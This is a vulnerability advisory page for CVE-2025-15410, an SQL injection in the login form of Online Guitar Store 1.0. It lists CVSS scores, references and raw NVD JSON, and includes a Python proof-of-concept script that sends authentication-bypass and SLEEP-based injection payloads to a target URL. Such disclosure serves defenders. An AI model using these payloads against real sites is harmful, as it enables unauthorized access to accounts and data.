CVE-2025-15410

Description

A vulnerability was identified in code-projects Online Guitar Store 1.0. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument L_email leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:anisha:online_guitar_store:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Guitar Store 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import sys # CVE-2025-15410 PoC - SQL Injection in Online Guitar Store 1.0 /login.php # Target: code-projects Online Guitar Store 1.0 # Vulnerability: L_email parameter SQL Injection def exploit_sqli(target_url): """ SQL Injection PoC for CVE-2025-15410 Tests for boolean-based blind SQL injection """ # Normal request (should fail with invalid credentials) normal_data = { 'L_email': '[email protected]', 'L_password': 'wrongpassword' } # SQL Injection payloads to test payloads = [ "admin' OR '1'='1", "admin' OR '1'='1' --", "admin' OR '1'='1' #", "' OR '1'='1' --", "' OR '1'='1' #", "admin' UNION SELECT NULL--", "admin' AND SLEEP(5)--" ] print(f'[*] Target: {target_url}') print(f'[*] Testing SQL Injection vulnerability...') try: # Test normal request first response = requests.post(target_url, data=normal_data, timeout=10) print(f'[+] Normal request status: {response.status_code}') # Test injection payloads for payload in payloads: print(f'\n[*] Testing payload: {payload}') inject_data = { 'L_email': payload, 'L_password': 'anything' } response = requests.post(target_url, data=inject_data, timeout=10) # Check for signs of successful injection if 'login' not in response.text.lower() or response.status_code != 200: print(f'[+] Potential injection detected!') print(f'[+] Response length: {len(response.text)}') else: print(f'[-] No obvious injection response') except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url>') print(f'Example: python {sys.argv[0]} http://target.com/login.php') sys.exit(1) target = sys.argv[1] exploit_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15410
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15410
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15410/
[4] VulDB https://vuldb.com/cve/CVE-2025-15410
[5] https://code-projects.org/
[6] https://github.com/jjjjj-zr/jjjjjzr19/issues/4
[7] https://vuldb.com/?ctiid.339330
[8] https://vuldb.com/?id.339330
[9] https://vuldb.com/?submit.728394

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15410", "sourceIdentifier": "[email protected]", "published": "2026-01-01T19:15:53.177", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in code-projects Online Guitar Store 1.0. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument L_email leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anisha:online_guitar_store:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A654C03A-271A-4CFA-BBB2-CD90BF541FA2"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/jjjjj-zr/jjjjjzr19/issues/4", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339330", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339330", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.728394", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}